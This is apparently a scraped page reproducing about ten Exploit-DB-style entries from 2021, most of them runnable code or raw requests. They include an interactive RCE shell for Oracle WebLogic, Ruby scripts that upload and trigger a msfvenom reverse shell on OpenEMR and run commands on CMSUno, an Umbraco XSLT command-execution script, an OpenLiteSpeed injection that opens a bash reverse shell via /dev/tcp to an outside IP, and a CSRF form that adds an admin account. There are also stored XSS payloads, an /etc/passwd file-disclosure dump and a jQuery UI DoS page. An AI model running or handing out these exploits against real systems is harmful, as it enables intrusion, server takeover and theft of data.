ISHACK AI BOT

# Exploit Title: Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting # Exploit Author: Chiragh Arora # Hardware Model: Tenda AC5 AC1200 # Firmware version: V15.03.06.47_multi # Tested on: Kali Linux # CVE ID: CVE-2021-3186 # Date: 25.01.2021 ########################################################################## Steps to Reproduce - - Navigate to the Tenda AC1200 gateway with 192.168.0.1 - Follow up to the WiFi Settings and click the “WiFi Name & Password” option there. - Manipulate the WiFi Name with "<script>alert(1)</script>" - Click the “Save” button & as the page refresh, you’ll got an alert stating “1” within it. Note: It doesn’t matter which Network Name parameter (2.4 GHz or 5 GHz) you’re manipulating, you’ll encounter the popup over in both of them.

# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated) # Google Dork: inurl:"/console/login/LoginForm.jsp" # Date: 01/26/2021 # Exploit Author: CHackA0101 # Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html # Version: Oracle WebLogic Server, version 12.2.1.0 # Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux) # Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html # CVE : CVE-2020-14882 # More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md #!/usr/bin/python3 import requests import argparse import http.client http.client.HTTPConnection._http_vsn=10 http.client.HTTPConnection._http_vsn_str='HTTP/1.0' parse=argparse.ArgumentParser() parse.add_argument('-u','--url',help='url') args=parse.parse_args() proxies={'http':'127.0.0.1:8080'} cmd_="" # Headers headers = { "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0", "Accept":"application/json,text/plain,*/*", "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding":"gzip,deflate", "Upgrade-Insecure-Requests":"1", "Content-Type":"application/x-www-form-urlencoded", "Cache-Control":"max-age=0", "Connection":"close" } # Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation: url=args.url+"""/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");""" url_=args.url+"/console/images/%252E%252E%252Fconsole.portal" form_data_="""_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write("");}executeThread.interrupt();");""" #data_ = parse.urlencode(form_data_) results1=requests.get(url,headers=headers) if results1.status_code==200: print("(Load Headers...)\n") print("(Data urlencode...)\n") print("(Execute exploit...)\n") print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n") while True: cmd_test = input("(CHackA0101GNU/Linux)$ ") if cmd_test=="exit": break else: try: cmd_ = cmd_test headers = { 'cmd': cmd_, 'Content-Type':'application/x-www-form-urlencoded', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Connection':'close', 'Accept-Encoding':'gzip,deflate', 'Content-Length':'1244', 'Content-Type':'application/x-www-form-urlencoded' } results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text print(results_) except: pass else: print("(CHackA0101-GNU/Linux)$ Fail.\n")

# Exploit Title: Simple College Website 1.0 - 'full' Stored Cross Site Scripting # Exploit Author: Marco Catalano (@stunn4) # Date: 2021-01-25 # Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code # Affected Version: 1.0 # Vulnerable parameter: "full" (POST method) # Tested on: Linux, PHP/7.4.11 Explaination: The source of "/admin_pages/admission.php" file defines the following lines of code: if (isset($_POST['add'])&&!empty($_POST['full'])) { $full=$_POST['full']; $query=mysqli_query($conn,"UPDATE `contents` SET `full_contents`='$full' WHERE `id`='2'"); if ($query) { echo "<b style='color:white;'>Page changed..!</b>"; } else if(!$query){ echo "<b style='color:white;'>Page is not changed..!</b>"; } } which allow to an authenticated administrator to modify the source code of the page. Every change is then reflected and the user-input is not properly sanitized, this leads to cross site scripting attacks. An attacker may try to gain access to the admin panel using authentication bypass through sql injection exploit. Proof Of Concept: The attacker is logged into the administrator panel and modifies the source code of admission.php page to inject javascript code as it follows: POST /admin_pages/admission.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/admin_pages/admission.php Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj Upgrade-Insecure-Requests: 1 full=<script>alert("xss+PoC+by+stunn4")%3b</script>&add=Update+Contents The XSS payload is stored in the database, so a victim would browse http://127.0.0.1/admission.php and execute the XSS payload.

# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) # Date: 26/1/2021 # Exploit Author: cmOs - SunCSR # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.8 # Tested on Windows 10 Step 1: Log in to the dashboard using the Administrator account. Step 2 : Access Server Configuration > External App > Command Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon) Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value Step 5: Graceful Restart [POC] POST /view/confMgr.php HTTP/1.1 Host: target:7080 Connection: close Content-Length: 579 Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://target:7080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://target:7080/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee; litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D; LSPA37FE0C43B84483E0=excYiZbpUS4%3D name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077

# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin) # Date: 19.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.stvs.ch STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin) Vendor: STVS SA Product web page: http://www.stvs.ch Platform: Ruby Affected version: 5.9.10 (build 2885-3a8219a) 5.9.9 (build 2882-7c3b787) 5.9.7 (build 2871-a450938) 5.9.1 (build 2771-1bbed11) 5.9.0 (build 2701-6123026) 5.8.6 (build 2557-84726f7) 5.7 5.6 5.5 Summary: STVS is a Swiss company specializing in development of software for digital video recording for surveillance cameras as well as the establishment of powerful and user-friendly IP video surveillance networks. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Ubuntu 14.04.3 nginx/1.12.1 nginx/1.4.6 nginx/1.1.19 nginx/0.7.65 nginx/0.3.61 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5625 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php 19.01.2021 -- <html> <body> <form action="http://192.168.1.17/users/create" method="POST"> <input type="hidden" name="login" value="testingus" /> <input type="hidden" name="password" value="testingus" /> <input type="hidden" name="confirm&#95;password" value="testingus" /> <input type="hidden" name="email" value="test&#64;test&#46;tld" /> <input type="hidden" name="role&#95;id" value="1" /> <input type="hidden" name="never&#95;expire" value="on" /> <input type="hidden" name="disabled&#95;acc" value="false" /> <input type="submit" value="Forge request" /> </form> </body> </html>

# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated) # Date: 19.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.stvs.ch STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability Vendor: STVS SA Product web page: http://www.stvs.ch Platform: Ruby Affected version: 5.9.10 (build 2885-3a8219a) 5.9.9 (build 2882-7c3b787) 5.9.7 (build 2871-a450938) 5.9.1 (build 2771-1bbed11) 5.9.0 (build 2701-6123026) 5.8.6 (build 2557-84726f7) 5.7 5.6 5.5 Summary: STVS is a Swiss company specializing in development of software for digital video recording for surveillance cameras as well as the establishment of powerful and user-friendly IP video surveillance networks. Desc: The NVR software ProVision suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the files parameter in archive download script (archive.rb) is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files. Tested on: Ubuntu 14.04.3 nginx/1.12.1 nginx/1.4.6 nginx/1.1.19 nginx/0.7.65 nginx/0.3.61 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5623 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php 19.01.2021 -- #1 LFI Prober (FP): ------------------- GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: 192.168.1.17 Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80" Accept: application/json, text/javascript, */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Origin: http://192.168.1.17 Referer: http://192.168.1.17/archive Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_stream=1; __flash__info= Connection: close HTTP/1.1 500 Not Found Server: nginx/1.4.6 (Ubuntu) Date: Mon, 18 Jan 2021 23:23:30 GMT Content-Type: text/html Content-Length: 2727 Connection: close <h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3><ul><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li><li>(eval):27:in `send'</li><li>(eval):27:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li><li>/usr/local/bin/provision_server:69:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li><li>/usr/local/bin/provision_server:63:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li><li>/usr/local/bin/provision_server:62:in `new'</li><li>/usr/local/bin/provision_server:62</li></ul> #2 LFI Prober (Verified): ------------------------- $ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd" root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false provision:x:999:107::/srv/provision/provision:/bin/bash stvs:x:1000:100::/home/stvs:/bin/bash usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false ntp:x:104:108::/home/ntp:/bin/false messagebus:x:105:110::/var/run/dbus:/bin/false sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin statd:x:107:65534::/var/lib/nfs:/bin/false -- Errno::ENOENT No such file or directory - /var/www/index.html: /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize' /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new' /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'

# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) # Exploit Author: Alexandre ZANNI # Date: 2020-07-16 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile # Version: < 5.0.1 (Patch 4) # Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3 # References: https://www.exploit-db.com/exploits/48515 #!/usr/bin/env ruby require 'httpclient' require 'docopt' shell_name = 'shell4.php' user = 'openemr_admin' password = 'xxxxxx' payload = 'php/reverse_php' lhost = '10.10.15.201' lport = 8888 doc = <<~DOCOPT OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution Usage: #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug] #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug] #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -s <filename>, --shell <filename> Filename of the PHP reverse shell payload -u <username>, --user <username> Username of the admin -p <password>, --password <password> Password of the admin -m <payload>, --payload <payload> Metasploit PHP payload -h <host>, --lhost <host> Reverse shell local host -t <port>, --lport <port> Reverse shell local port --debug Display arguments -H, --help Show this screen Examples: #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123 #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888 #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999 DOCOPT begin args = Docopt.docopt(doc) pp args if args['--debug'] if args['manual'] shell_name = File.basename(args['--shell']) shell_path = args['--shell'] else shell_name = "tmp#{rand(1000)}.php" shell_path = shell_name end if args['semi-auto'] payload = args['--payload'] else payload = 'php/reverse_php' end # Authentication data uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default") data_1= { 'new_login_session_management' => '1', 'authProvider' => 'Default', 'authUser' => args['--user'], 'clearPass' => args['--password'], 'languageChoice' => '1' } # Reverse shell data unless args['manual'] puts "[+] Generating the reverse shell payload: #{shell_name}" %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name}) end data_2 = { 'site' => 'default', 'mode' => 'save', 'docid' => shell_name, 'content' => File.read(shell_path)} uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default") uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}") clnt = HTTPClient.new puts '[+] Authenticating' clnt.post(uri_1, data_1) puts '[+] Uploading the reverse shell' clnt.post(uri_2, data_2) puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}" clnt.get(uri_3) rescue Docopt::Exit => e puts e.message end

# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting # Exploit Author: Mahendra Purbia # Vendor Homepage: http://egavilanmedia.com # Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/ # Version: 1.0 # Tested on: Windows 10 Vulnerable Parameters: Full Name Steps for reproduce: 1. go to http://localhost/PHPCRUD/ 2. now click on "add new record" and fill the details (in first name name use :"><svg onload=alert(1)// ) 3. Now reload the page and you will see that our XSS payload executed . Its an Stored XSS.

# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated) # Google Dorks: # inurl:uno/central.php # inurl:uno/config.php # inurl:uno.php intitle:"CMSUno - Login" # Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066 # Vendor Homepage: https://www.boiteasite.fr/cmsuno.html # Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz # Version: 1.6.1, 1.6.2 # Tested on: docker image: php:7.4-apache (Debian buster) # CVE : CVE-2020-25557 & CVE-2020-25538 # Vulnerabilities ## Discoverer: Fatih Çelik ## Discoverer website: https://fatihhcelik.blogspot.com ## Vulnerability 1: ## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated) ## CVE: CVE-2020-25557 ## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html ## Vulnerability 2: ## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) ## CVE: CVE-2020-25538 ## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html #!/usr/bin/env ruby require 'httpclient' require 'docopt' # username = 'cmsuno' # password = '654321' # root_url = 'http://localhost:5000/' # command = 'pwd' doc = <<~DOCOPT CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated) Usage: #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -u <username>, --user <username> user name (if not default: cmsuno) -p <password>, --pass <password> User password (if not default: 654321) -c <cmd>, --command <cmd> Command to execute on the target -t <tehc>, --technique <tech> Technique: exploiting 'user' param (default, with output) or 'lang' param (blind) --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} -r http://example.org -c id #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang DOCOPT # Get anti-CSRF token def get_unox(client, auth_status) print '[*] Fetching anti-CSRF token: ' res = client.get(LOGIN_URL) case auth_status when false regexp = /name="unox" value="([a-f0-9]{32}?)"/ when true regexp = /Unox='([a-f0-9]{32}?)'/ end token = regexp.match(res.body).captures[0].chomp puts token return token end def login(client, user, pass) data = { 'unox' => get_unox(client, false), 'user' => user, 'pass' => pass, } puts '[*] Logging in' res = client.post(LOGIN_URL, data) return res.body end def exploit(client, user, pass, cmd, tech) payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// " case tech when 'user' data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en" when 'lang' data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}" else raise 'Wrong exploitation technique argument value' end headers = { 'X-Requested-With' => 'XMLHttpRequest' } #client.proxy = 'http://localhost:8080' puts "[*] Starting exploitation, using '#{tech}' param technique" client.post(VULNERABLE_URL, data, headers) # Login again to trigger uno/password.php clnt2 = HTTPClient.new return login(clnt2, user, pass).lines[..-2].join end begin args = Docopt.docopt(doc) pp args if args['--debug'] username = args['--user'] || 'cmsuno' password = args['--pass'] || '654321' technique = args['--technique'] || 'user' LOGIN_URL = "#{args['--root-url']}/uno.php" VULNERABLE_URL = "#{args['--root-url']}/uno/central.php" clnt = HTTPClient.new login(clnt, username, password) output = exploit(clnt, username, password, args['--command'], technique) print '[*] Command output:' case technique when 'user' puts "\n#{output}" when 'lang' puts ' blind RCE, no output with this exploitation technique' end rescue Docopt::Exit => e puts e.message end

# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS) # Date: 20 Jan, 2021 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://jqueryui.com/ # Software Link: https://jqueryui.com/download/ # Version: <= 1.12.1 # CVE : CVE-2020-28488 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>DoS - jQuery UI 1.12.1</title> </head> <body> <h2>DoS - jQuery UI 1.12.1</h2> <div> <button onclick="exploit()">Exploit</button> </div> <p>PoC by Rafael Cintra Lopes</p> <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script> <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script> <script> function exploit(){ for (var i = 0; i < 10; i++) { $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'}); } } </script> </body> </html>

# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) # Date: 2020-03-28 # Exploit Author: Alexandre ZANNI (noraj) # Based on: https://www.exploit-db.com/exploits/46153 # Vendor Homepage: http://www.umbraco.com/ # Software Link: https://our.umbraco.com/download/releases # Version: 7.12.4 # Category: Webapps # Tested on: Windows IIS # Example: python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig import requests import re import argparse from bs4 import BeautifulSoup parser = argparse.ArgumentParser(prog='exploit.py', description='Umbraco authenticated RCE', formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80)) parser.add_argument('-u', '--user', metavar='USER', type=str, required=True, dest='user', help='username / email') parser.add_argument('-p', '--password', metavar='PASS', type=str, required=True, dest='password', help='password') parser.add_argument('-i', '--host', metavar='URL', type=str, required=True, dest='url', help='root URL') parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True, dest='command', help='command') parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False, dest='arguments', help='arguments', default='') args = parser.parse_args() # Payload payload = """\ <?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\ """ % (args.arguments, args.command) login = args.user password = args.password host = args.url # Process Login url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin" loginfo = { "username": login, "password": password} s = requests.session() r2 = s.post(url_login,json=loginfo) # Go to vulnerable web page url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx" r3 = s.get(url_xslt) soup = BeautifulSoup(r3.text, 'html.parser') VIEWSTATE = soup.find(id="__VIEWSTATE")['value'] VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'] UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'] headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN} data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE, "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, "ctl00$body$xsltSelection": payload, "ctl00$body$contentPicker$ContentIdValue": "", "ctl00$body$visualizeDo": "Visualize+XSLT" } # Launch the attack r4 = s.post(url_xslt, data=data, headers=headers) # Filter output soup = BeautifulSoup(r4.text, 'html.parser') CMDOUTPUT = soup.find(id="result").getText() print(CMDOUTPUT)

